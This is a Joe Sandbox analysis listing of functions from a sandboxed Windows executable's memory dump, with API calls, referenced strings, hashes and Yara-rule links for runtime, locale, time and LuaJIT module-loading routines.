Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: a78ce45543d163b27d273261e845287827b59cb7cb8f5f1008334f4b2a1c458a
Instruction ID: a55aac6706f92c83023b4ef68ff513bc1386e538d8d4de60d9fd41f1ece5bac1
Opcode Fuzzy Hash: a78ce45543d163b27d273261e845287827b59cb7cb8f5f1008334f4b2a1c458a
Instruction Fuzzy Hash: BD91A7F2B0474647EB58AF29CD417E9A296FF54788F849035DA0D4A785EE3CF581CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C08C9C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF720C08D15
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF720C08D2D
RtlVirtualUnwind.KERNEL32 ref: 00007FF720C08D68
IsDebuggerPresent.KERNEL32 ref: 00007FF720C08DA1
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF720C08DAB
UnhandledExceptionFilter.KERNEL32 ref: 00007FF720C08DB6

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 51f52da4c5a4008aadc5bd230d6ecd048176a1ee57bc4013da91a956b30600b9
Instruction ID: bb6d74db4c03bd36c405d0c80b7c6989148745f6c00069724aad68b3059e6099
Opcode Fuzzy Hash: 51f52da4c5a4008aadc5bd230d6ecd048176a1ee57bc4013da91a956b30600b9
Instruction Fuzzy Hash: C1318476618F8186DB609F29EC402EEB3A0FB94754F900135EA9D43B98DF38D585CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0C81C Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF720C0C88B
WriteFile.KERNEL32 ref: 00007FF720C0CB42
WriteFile.KERNEL32 ref: 00007FF720C0CB94
GetLastError.KERNEL32 ref: 00007FF720C0CC96
GetLastError.KERNEL32 ref: 00007FF720C0CCF6

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: d781c31e04745800bfa0f421d82ff93f3733d0fe2e0e7ef74ea63fc8014f1798
Instruction ID: e0e427216633348253353d0ad360a21f95aee919a7992d5851cebeb5ca87ec9d
Opcode Fuzzy Hash: d781c31e04745800bfa0f421d82ff93f3733d0fe2e0e7ef74ea63fc8014f1798
Instruction Fuzzy Hash: E3E129B2B186818AE700DF68D8801EDB771FB447C8F944136DE4E57B99DE38E55ACB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C13014 Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF720C13042

Part of subcall function 00007FF720C12780: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C12794

_get_daylight.LIBCMT ref: 00007FF720C13053

Part of subcall function 00007FF720C12720: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C12734

_get_daylight.LIBCMT ref: 00007FF720C13064

Part of subcall function 00007FF720C12750: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C12764

Part of subcall function 00007FF720C09630: HeapFree.KERNEL32(?,?,?,00007FF720C19018,?,?,?,00007FF720C1939B,?,?,00000019,00007FF720C19A70,?,?,?,00007FF720C199A3), ref: 00007FF720C09646
Part of subcall function 00007FF720C09630: GetLastError.KERNEL32(?,?,?,00007FF720C19018,?,?,?,00007FF720C1939B,?,?,00000019,00007FF720C19A70,?,?,?,00007FF720C199A3), ref: 00007FF720C09658

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF720C13270), ref: 00007FF720C1308B

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: b1694709959b112dda49aced4665659e4135d8c6dd5ee1d3d9ed6f6d5bcf2363
Instruction ID: 5076b60e146ab4f9f2d4f6645b4bedd2cb4f7ca4d12fe2138d8646d01970a559
Opcode Fuzzy Hash: b1694709959b112dda49aced4665659e4135d8c6dd5ee1d3d9ed6f6d5bcf2363
Instruction Fuzzy Hash: 85616AA6A1864286EB20FF29DC811E9E761FF58784F845135EA4D43B96DF3CF4818B70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C12C9C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF720C15B84: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C15BB2

_get_daylight.LIBCMT ref: 00007FF720C12DB9
_get_daylight.LIBCMT ref: 00007FF720C12DCA

Strings

?, xrefs: 00007FF720C12D45

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 43994107b9139f93abcf963023f9d2a37c6d795dedf3aa80b307676cc2872238
Instruction ID: 92b1bf625891f4cd63fa5a62a56481cfb7e78b806708a43944f097adb3e238ab
Opcode Fuzzy Hash: 43994107b9139f93abcf963023f9d2a37c6d795dedf3aa80b307676cc2872238
Instruction Fuzzy Hash: 0A91C7AAA1825245F724BB19D8002FAE661EF50B94F945135EA4D07BC9DE3CF4E2CF70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C09CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C09D09
GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF720C076EA), ref: 00007FF720C09D37

Strings

GetLocaleInfoEx, xrefs: 00007FF720C09CEC, 00007FF720C09CFD

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: InfoLocaletry_get_function
String ID: GetLocaleInfoEx
API String ID: 2200034068-2904428671
Opcode ID: 1320189c10d08737c10867949436e1f60fcdb1951e034d40a47ea20f6378357c
Instruction ID: 010167a96de30fd236f6f34c6084fdc5d8cc968847356e0eb84a537cdcb70795
Opcode Fuzzy Hash: 1320189c10d08737c10867949436e1f60fcdb1951e034d40a47ea20f6378357c
Instruction Fuzzy Hash: 900167A5B0874186E754AB29B8400E9E761FF54BD0F984436DE4C13B55CE3CE581CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0A0EC Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C0A107
try_get_function.LIBVCRUNTIME ref: 00007FF720C0A126

Part of subcall function 00007FF720C09714: GetProcAddress.KERNEL32(?,00000000,00000002,00007FF720C09BF2,?,?,?,00007FF720C0AF02,?,?,?,00007FF720BFB3E1), ref: 00007FF720C0986C

try_get_function.LIBVCRUNTIME ref: 00007FF720C0A145

Part of subcall function 00007FF720C09714: LoadLibraryW.KERNELBASE(?,00000000,00000002,00007FF720C09BF2,?,?,?,00007FF720C0AF02,?,?,?,00007FF720BFB3E1), ref: 00007FF720C097B7
Part of subcall function 00007FF720C09714: GetLastError.KERNEL32(?,?,?,00007FF720C0AF02,?,?,?,00007FF720BFB3E1,?,?,?,?,00007FF720C10643), ref: 00007FF720C097C5
Part of subcall function 00007FF720C09714: LoadLibraryExW.KERNEL32(?,?,?,00007FF720C0AF02,?,?,?,00007FF720BFB3E1,?,?,?,?,00007FF720C10643), ref: 00007FF720C09807

try_get_function.LIBVCRUNTIME ref: 00007FF720C0A164

Part of subcall function 00007FF720C09714: FreeLibrary.KERNEL32(?,?,?,00007FF720C0AF02,?,?,?,00007FF720BFB3E1,?,?,?,?,00007FF720C10643), ref: 00007FF720C09840

try_get_function.LIBVCRUNTIME ref: 00007FF720C0A183
try_get_function.LIBVCRUNTIME ref: 00007FF720C0A1A2
try_get_function.LIBVCRUNTIME ref: 00007FF720C0A1C1
try_get_function.LIBVCRUNTIME ref: 00007FF720C0A1E0
try_get_function.LIBVCRUNTIME ref: 00007FF720C0A1FF
try_get_function.LIBVCRUNTIME ref: 00007FF720C0A21E

Strings

LocaleNameToLCID, xrefs: 00007FF720C0A223, 00007FF720C0A236
GetLocaleInfoEx, xrefs: 00007FF720C0A169, 00007FF720C0A17C
CompareStringEx, xrefs: 00007FF720C0A10C, 00007FF720C0A11F
LCIDToLocaleName, xrefs: 00007FF720C0A204, 00007FF720C0A217
GetDateFormatEx, xrefs: 00007FF720C0A14A, 00007FF720C0A15D
AreFileApisANSI, xrefs: 00007FF720C0A100
LCMapStringEx, xrefs: 00007FF720C0A1E5, 00007FF720C0A1F8
GetUserDefaultLocaleName, xrefs: 00007FF720C0A1A7, 00007FF720C0A1BA
IsValidLocaleName, xrefs: 00007FF720C0A1C6, 00007FF720C0A1D9
EnumSystemLocalesEx, xrefs: 00007FF720C0A12B, 00007FF720C0A13E
GetTimeFormatEx, xrefs: 00007FF720C0A188, 00007FF720C0A19B

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 3255926029-3252031757
Opcode ID: ab57395a1dd642966f0208e63bb71cca90a7c8cde1eec80d0d047cd74b423100
Instruction ID: 24ea04323ee5c1ce48141ccab5f480998406b9c7cb5914d590a7852f84f0b858
Opcode Fuzzy Hash: ab57395a1dd642966f0208e63bb71cca90a7c8cde1eec80d0d047cd74b423100
Instruction Fuzzy Hash: F2314CE4919A47AAF754FB6CAC416E4A322EF14B40FC05437D10D26BA58E7CB6C9CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BA2050 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 157libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?,?,?,?,?,00007FF720BA150F), ref: 00007FF720BA215B
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF720BA150F), ref: 00007FF720BA21BB
GetModuleHandleA.KERNEL32(?,?,?,?,?,00007FF720BA150F), ref: 00007FF720BA21F8
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF720BA150F), ref: 00007FF720BA2209
GetModuleHandleExA.KERNEL32(?,?,?,?,?,00007FF720BA150F), ref: 00007FF720BA2226
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF720BA150F), ref: 00007FF720BA2238

Strings

luaJIT_BC_%s, xrefs: 00007FF720BA21DB
luaopen_%s, xrefs: 00007FF720BA21A3
path too long, xrefs: 00007FF720BA2087
_LOADLIB, xrefs: 00007FF720BA2106
LOADLIB: %s, xrefs: 00007FF720BA20AB, 00007FF720BA2122
*, xrefs: 00007FF720BA2181

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: *$LOADLIB: %s$_LOADLIB$luaJIT_BC_%s$luaopen_%s$path too long
API String ID: 551388010-1299629974
Opcode ID: f3a9ec938cfb732e56b9769aeeac68db1fb725e4448d22c907f562046ba836a7
Instruction ID: 986614203aab36214786c5efc95d004c92d860270d4dbe9cc885a56364bcaea8
Opcode Fuzzy Hash: f3a9ec938cfb732e56b9769aeeac68db1fb725e4448d22c907f562046ba836a7
Instruction Fuzzy Hash: 0C518051E0878246FA61BB2A9C143BD9291EF85BE0F944235ED1F17BE5EE2CF4518B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BA0D70 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF720C05614: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF720C05628

wcsftime.LIBCMT ref: 00007FF720BA1021

Strings

yday, xrefs: 00007FF720BA0F35
hour, xrefs: 00007FF720BA0E7E
sec, xrefs: 00007FF720BA0E3E
min, xrefs: 00007FF720BA0E5E
isdst, xrefs: 00007FF720BA0F5D
month, xrefs: 00007FF720BA0EC3
day, xrefs: 00007FF720BA0E9E
wday, xrefs: 00007FF720BA0F10
year, xrefs: 00007FF720BA0EEB

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: Time$FileSystemwcsftime
String ID: day$hour$isdst$min$month$sec$wday$yday$year
API String ID: 4211464514-297742768
Opcode ID: 070d3b06e21fe01fe3ff19482cb1903925334d2b5cccd04c797b402d5cae489a
Instruction ID: 7988cf1cf1582b18e6098e8ec7b0fed9a143b015dc3c81933ac2d728bb378fd5
Opcode Fuzzy Hash: 070d3b06e21fe01fe3ff19482cb1903925334d2b5cccd04c797b402d5cae489a
Instruction Fuzzy Hash: 44919462A0868143FA31FB299C442AEB355EF85BA0F904135DE5E077A5DF3CF5928B70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B8FC30 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF720B8FCCD
DeleteCriticalSection.KERNEL32 ref: 00007FF720B8FCDA
LoadLibraryExA.KERNEL32 ref: 00007FF720B8FDCC
GetProcAddress.KERNEL32 ref: 00007FF720B8FDE8
GetProcAddress.KERNEL32 ref: 00007FF720B8FE03
InitializeCriticalSection.KERNEL32 ref: 00007FF720B8FE2E
CreateThread.KERNEL32 ref: 00007FF720B8FE57

Strings

timeEndPeriod, xrefs: 00007FF720B8FDF5
winmm.dll, xrefs: 00007FF720B8FDC3
timeBeginPeriod, xrefs: 00007FF720B8FDDE

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AddressCriticalProcSection$CreateDeleteInitializeLibraryLoadObjectSingleThreadWait
String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
API String ID: 3275198946-184456188
Opcode ID: 92299bf26988db8d84b207b018e881ffa7dc40e2995672530baf49bf9e40abd0
Instruction ID: 06910dd603eecfa3a4f75827993a0378339b13b7a7d14bf9fafb2b6a3143dcb6
Opcode Fuzzy Hash: 92299bf26988db8d84b207b018e881ffa7dc40e2995672530baf49bf9e40abd0
Instruction Fuzzy Hash: 476112A1908B4385EB20EB29EC451B8B7A6FF44B45FC80039C99E06769DF7CB495CB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BA1880 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF720BA194F
GetProcAddress.KERNEL32 ref: 00007FF720BA1960
GetModuleHandleExA.KERNEL32 ref: 00007FF720BA197A
GetProcAddress.KERNEL32 ref: 00007FF720BA198C

Strings

'package.preload' must be a table, xrefs: 00007FF720BA18C2
luaJIT_BC_%s, xrefs: 00007FF720BA192E
preload, xrefs: 00007FF720BA1899
no field package.preload['%s'], xrefs: 00007FF720BA19B3

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
API String ID: 1646373207-4005544233
Opcode ID: d0425c6852bbb35cc95656d5f7ac72e07990d1df4d6a183fe3e63317efc0d1a0
Instruction ID: ee4371735f239bcf4f0deaa19908fd4a8e42eb2f34b6cfed6c2a7ef0b72cc1b4
Opcode Fuzzy Hash: d0425c6852bbb35cc95656d5f7ac72e07990d1df4d6a183fe3e63317efc0d1a0
Instruction Fuzzy Hash: 7B31A061A0864242EA64BB2AAC541BE9261EF45BD0FC45635ED1F07BE9DE3CF5418B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0243C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 479COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C02472

Strings

f, xrefs: 00007FF720C02563
-, xrefs: 00007FF720C024D7
p, xrefs: 00007FF720C0256B
p, xrefs: 00007FF720C024F3

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$f$p$p
API String ID: 3215553584-2516539321
Opcode ID: 6d9718cc4aaba9d1bb1b069d4f507f805525112df42b78793867432a1c80f7ac
Instruction ID: 4d87e9c23b9898cbc19f9767caeffd4028e986a85358cf4182e273c81de968d1
Opcode Fuzzy Hash: 6d9718cc4aaba9d1bb1b069d4f507f805525112df42b78793867432a1c80f7ac
Instruction Fuzzy Hash: 9C1240A2E1824386FB646A1DD8542F9A6A2FF80764FD44231E699467C8DE3CF5C0DF70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C1F550 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF720C1F581
GetLastError.KERNEL32 ref: 00007FF720C1F58D
CloseHandle.KERNEL32 ref: 00007FF720C1F5A5
CreateFileW.KERNEL32 ref: 00007FF720C1F5D0
WriteConsoleW.KERNEL32 ref: 00007FF720C1F5EF

Strings

CONOUT$, xrefs: 00007FF720C1F5B1

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 2726d88a7a3e12e43dc10a873b8cbe2ff6c834c430beca4be323d9c6aa3b38c2
Instruction ID: bacb49647502a4e2e7b418dc0e7c1f2469a14aa5496f58b82f7ef4212c894d3e
Opcode Fuzzy Hash: 2726d88a7a3e12e43dc10a873b8cbe2ff6c834c430beca4be323d9c6aa3b38c2
Instruction Fuzzy Hash: B2118761A18A8186E3509B1AFC54369E2A0FF98BE4F940234DE1D87794CF3CE5948B60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B7D3C0 Relevance: 9.1, APIs: 6, Instructions: 76COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF720B7D413
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF720B7D42E
RtlVirtualUnwind.KERNEL32 ref: 00007FF720B7D473
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF720B7D493
RtlRestoreContext.KERNEL32 ref: 00007FF720B7D4D0
RaiseException.KERNEL32 ref: 00007FF720B7D512

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ContextEntryFunctionLookup$CaptureExceptionRaiseRestoreUnwindVirtual
String ID:
API String ID: 2358177407-0
Opcode ID: 050ec86600a775e1ba4a6fe656570c8a09b9775de57354fe22a5cd9ab7a00de7
Instruction ID: 465d00b9161ecff67bbb906ab59289b9c63f3f42bd5d442f4b7056670cb9b9e3
Opcode Fuzzy Hash: 050ec86600a775e1ba4a6fe656570c8a09b9775de57354fe22a5cd9ab7a00de7
Instruction Fuzzy Hash: 25313032608A8596EB609F15F8447EEB361FB98780F844436DA8E03B68DE3CE545CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BA0360 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227COMMON

Download Yara Rule

Strings

%lf, xrefs: 00007FF720BA0439
too many arguments, xrefs: 00007FF720BA03BD

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: %lf$too many arguments
API String ID: 3215553584-3990051606
Opcode ID: 6914881ddc5360937c0fc87212d53d73bd0b64e47b61ffbcc14248390cfb5a9d
Instruction ID: f285ac24fcf5e3245ee6d76ac2328bce35486020d848836869be4e10c78985ec
Opcode Fuzzy Hash: 6914881ddc5360937c0fc87212d53d73bd0b64e47b61ffbcc14248390cfb5a9d
Instruction Fuzzy Hash: 2381F922B1865546EA30BB2A9C8427EA391FB8CB94F904534DE5F47BD1DE3CF4518B70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BA7780 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF720BCB5F8

Strings

cannot resolve symbol '%s': %s, xrefs: 00007FF720BCB7A3

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

